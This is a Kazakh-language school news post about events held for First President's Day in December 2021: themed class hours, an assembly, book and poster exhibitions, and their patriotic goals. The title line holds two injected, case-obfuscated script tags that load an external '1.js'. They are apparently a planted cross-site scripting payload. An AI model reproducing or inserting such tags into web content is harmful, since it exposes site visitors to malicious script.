"Тұңғыш Президент күні", мектеп бойынша іс-шаралар<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

04.12.2021

"Тұңғыш Президент күнін" мерекелеу аясында мектепте "Ұлт Көшбасшысы" тақырыптық сынып сағаттары, "Мен сені мақтан тұтамын, Қазақстан" жалпы мектептік линейкасы, шағын орталықта ертеңгіліктер өтті.Көрме кітаптары, суреттер, плакаттар безендірілді. Барлық осы іс-шаралардың мақсаты: - ҚР Тұңғыш Президентінің өмірбаяны мен қызметі; оның Қазақстан Республикасының дамуындағы рөлінің маңыздылығы туралы білімді тереңдету; - танымдық қызығушылықты дамыту, ҚР Тұңғыш Президентінің тыныс-тіршілігі туралы ой-өрісін кеңейту; - оқушыларды Қазақстанның мемлекеттік рәміздеріне, еліміздің халықтарының тарихи өткені мен дәстүрлеріне құрметпен және ұқыпты қарауға тәрбиелеу, отансүйгіштік сезімін және өз Отанына деген сүйіспеншілікті, Тұңғыш Президенттің қызметіне құрметпен қарауды тәрбиелеу. 1 желтоқсан - бүкіл ел, бүкіл Қазақстан халқы Қазақстан Республикасының Тұңғыш Президенті күнін мақтанышпен атап өтеді. Мерекенің негізгі мақсаты-республика дамуының негізгі іргетасына айналған Елбасының идеялары мен саясаты төңірегінде топтасу .

Просмотров: 972


Пікір қосу



Деректерді қолтаңбаға қосу